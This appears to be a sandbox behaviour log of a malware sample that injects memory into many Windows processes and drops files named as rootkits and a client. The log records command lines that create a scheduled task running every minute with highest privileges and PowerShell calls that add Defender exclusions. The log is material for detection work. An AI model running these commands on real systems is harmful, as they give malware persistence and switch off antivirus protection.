Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108B940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F8FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16BF33D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A348770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27E6F950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadXClient.exe base: 1B410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EF2F790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2023BB50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
